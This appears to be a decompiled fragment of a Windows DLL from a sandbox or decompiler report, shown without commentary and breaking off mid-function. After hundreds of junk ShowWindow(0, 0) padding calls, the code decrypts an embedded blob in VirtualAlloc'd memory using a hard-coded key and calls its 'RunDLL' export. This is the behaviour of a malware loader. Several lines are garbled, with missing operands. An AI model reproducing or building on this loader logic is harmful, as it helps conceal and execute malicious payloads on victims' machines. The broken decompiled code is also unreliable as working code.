				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				_t1290 =  >=  ? _v188 :  &_v188;
				_t1291 = E100023E0( >=  ? _v188 :  &_v188, 0x11); // executed
				_t1374 = _t1373 + 8;
				 *0x10027aa0 = GetProcAddress(_t1356, _t1291);
				_t1294 =  >=  ? _v212 :  &_v212;
				 *0x10027aa4 = GetProcAddress(_t1356,  >=  ? _v212 :  &_v212);
				_push( &_v304);
				_push(3);
				_push( &_v20);
				_push(0x10000000);
				if( *0x10027aa0() >= 0) {
					 *0x10027aa4(0x10000000, _v304,  &_v300,  &_v292);
				}
				if(WriteFileGather(0, 0, 0, 0, 0) == 0) {
					_t1301 = E10008AB6();
					_t1303 = VirtualAlloc(0, _v292, _t1301 * E10008AB6(), "64"); // executed
					_t1364 = _t1303;
					E100083B0(_t1303, _v300, _v292);
					E10002CE0(_t1340, _t1347, _t1356, __eflags, "u9!71t6(X5bobTYxh&iO_3G4E0ay8quMMBDUfv74k7jqy3rYzw%0MIr)<iX1(@3xxwY&fp(<&<GgK9WB*TSsgB5ZJHGae7", 0x5f,  &_v296);
					E10002FB0(_t1303, _v292,  &_v296); // executed
					_t1377 = _t1374 + 0x30;
					_t1309 = E100058C0(_t1364, _v292); // executed
					_t1310 = E100057B0(_t1309, "RunDLL"); // executed
					 *_t1310("64", E10008AB6(), "64"); // executed
					MessageBoxA(0,  *0x10026070, 0, 0);
					__eflags = _v168 - 0x10;
					if(_v168 >= 0x10) {
						L100077B5(_v188);
						_t1377 = _t1377 + 4;
					}
					__eflags = _v120 - 0x10;
					_v168 = 0xf;
					_v172 = 0;
					_v188 = 0;
					if(_v120 >= 0x10) {
						L100077B5(_v140);
						_t1377 = _t1377 + 4;
					}
					__eflags = _v144 - 0x10;
					_v120 = 0xf;
					_v124 = 0;
					_v140 = 0;
					if(_v144 >= 0x10) {
						L100077B5(_v164);
						_t1377 = _t1377 + 4;
					}
					__eflags = _v24 - 0x10;
					_v144 = 0xf;
					_v148 = 0;
					_v164 = 0;
					if(_v24 >= 0x10) {
						L100077B5(_v44);
						_t1377 = _t1377 + 4;
					}
					__eflags = _v48 - 0x10;
					_v24 = 0xf;
					_v28 = 0;
					_v44 = 0;
					if(_v48 >= 0x10) {
						L100077B5(_v68);
						_t1377 = _t1377 + 4;
					}
					__eflags = _v192 - 0x10;
					_v48 = 0xf;
					_v52 = 0;
					_v68 = 0;
					if(_v192 >= 0x10) {
						L100077B5(_v212);
						_t1377 = _t1377 + 4;
					}
					__eflags = _v72 - 0x10;
					_v192 = 0xf;
					_v196 = 0;
					_v212 = 0;
					if(_v72 >= 0x10) {
						L100077B5(_v92);
						_t1377 = _t1377 + 4;
					}
					__eflags = _v96 - 0x10;
					_v72 = 0xf;
					_v76 = 0;
					_v92 = 0;
					if(_v96 >= 0x10) {
						L100077B5(_v116);
						_t1377 = _t1377 + 4;
					}
					__eflags = _v240 - 0x10;
					_v96 = 0xf;
					_v100 = 0;
					_v116 = 0;
					if(_v240 >= 0x10) {
						L100077B5(_v260);
					}
					_pop(_t1357);
					__eflags = _v8 ^ _t1367;
					_pop(_t1365);
					return E10007F44(_t1340, _v8 ^ _t1367, _t1354, _t1357, _t1365);
				} else {
					if(_v168 >= 0x10) {
						L100077B5(_v188);
						_t1374 = _t1374 + 4;
					}
					_v168 = 0xf;
					_v172 = 0;
					_v188 = 0;
					if(_v120 >= 0x10) {
						L100077B5(_v140);
						_t1374 = _t1374 + 4;
					}
					_v120 = 0xf;
					_v124 = 0;
					_v140 = 0;
					if(_v144 >= 0x10) {
						L100077B5(_v164);
						_t1374 = _t1374 + 4;
					}
					_v144 = 0xf;
					_v148 = 0;
					_v164 = 0;
					if(_v24 >= 0x10) {
						L100077B5(_v44);
						_t1374 = _t1374 + 4;
					}
					_v24 = 0xf;
					_v28 = 0;
					_v44 = 0;
					if(_v48 >= 0x10) {
						L100077B5(_v68);
						_t1374 = _t1374 + 4;
					}
					_v48 = 0xf;
					_v52 = 0;
					_v68 = 0;
					if(_v192 >= 0x10) {
						L100077B5(_v212);
						_t1374 = _t1374 + 4;
					}
					_v192 = 0xf;
					_v196 = 0;
					_v212 = 0;
					if(_v72 >= 0x10) {
						L100077B5(_v92);
						_t1374 = _t1374 + 4;
					}
					_v72 = 0xf;
					_v76 = 0;
					_v92 = 0;
					if(_v96 >= 0x10) {
						L100077B5(_v116);
						_t1374 = _t1374 + 4;
					}
					_v96 = 0xf;
					_v100 = 0;
					_v116 = 0;
					if(_v240 >= 0x10) {
						L100077B5(_v260);
					}
